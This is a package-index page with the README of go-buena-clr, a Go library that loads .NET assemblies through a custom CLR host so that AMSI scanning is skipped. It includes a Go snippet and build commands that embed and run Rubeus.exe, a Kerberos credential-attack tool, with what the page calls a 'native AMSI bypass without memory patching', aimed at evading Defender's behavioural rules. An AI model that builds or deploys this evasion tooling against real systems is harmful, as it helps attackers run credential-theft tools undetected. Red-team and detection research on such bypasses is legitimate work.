github.com/almounah/go-buena-clr

Release v0.0.0-20250418193448-c80d2c5c3944

Good CLR Host with go

Homepage Go Go Documentation

License
WTFPL
Install
go get github.com/almounah/go-buena-clr

Documentation

go-buena-clr

go-buena-clr

go-buena-clr CLR is the implementation in Go of Being a Good CLR Host by Joshua Magri from IBM X-Force Red.

It is built upon the go-clr project of Ne0nd0g, who in turn forked and maintained the original poc of go-clr by ropnop.

The purpose is to create our own IHostControl interface allowing us to implement the ProvideAssembly method. We can then use Load_2 method instead of Load_3, circumventing AMSI entirely.

Usage

Just import the package and use it !

import (
	clr "github.com/almounah/go-buena-clr"
)

//go:embed Rubeus.exe
var testNet []byte

func main() {
    params := []string{"triage"}

    // Load the Good CLR and get the identity string from the .Net
	pRuntimeHost, identityString, _ := clr.LoadGoodClr("v4.0.30319", testNet)

    // Load the Assembly via its identityString
	assembly := clr.Load2Assembly(pRuntimeHost, identityString)

    // Invoke the Assembly
	pMethodInfo, _ := assembly.GetEntryPoint()
	clr.InvokeAssembly(pMethodInfo, params)
}

Examples - Buena Village

Buena Village is a small POC project that showcase go-buena-clr in action. You can check examples/BuenaVillage/ for a README and the complete code.

Basically you do:

cd examples/BuenaVillage
go mod tidy
go run helper/helper.go -file=/home/kali/Desktop/Rubeus.exe && GOOS=windows GOARCH=amd64 go build

You will get a buenavillage.exe that you can use like Rubeus.exe whith native AMSI bypass without memory patching:

.\buenavillage.exe triage
.\buenavillage.exe -help

Motivation of Buena CLR

Basically we all noticed that a while ago, defender introduced behavioral rules to prevent AMSI memory patching.

Thanks to IBM X-Force Red, we got a patchless AMSI bypass that does not rely on the CPU like for Hardware Break Point !!

Contributions

All contributions are welcome :)

Side Story: Why the name go-buena-clr

In Mushoku Tensei buena village is the village where Rudeus Greyrat spent his childhood. As the name suggest, buena (good in spanish) village, was a good place for Rudeus to restart his life.

I named this project go-buena-clr as it is a good and warm CLR host for Rubeus.exe without AMSI, much like buena village was a good and warm place for Rudeus.

License

To continue ropnop legacy this project is still licensed under the Do What the Fuck You Want to Public License.

Stats

Dependencies
3
Dependent packages
0
Dependent repositories
0
Total releases
3
Latest release
First release
Stars
0
Forks
0
Watchers
0
Contributors
0
Repository size
375 KB
SourceRank
6

Releases

v0.1.0
v0.0.0-20250418193448-c80d2c5c3944
v0.0.0-20250418180543-b39f490f3ee2

Login to resync this project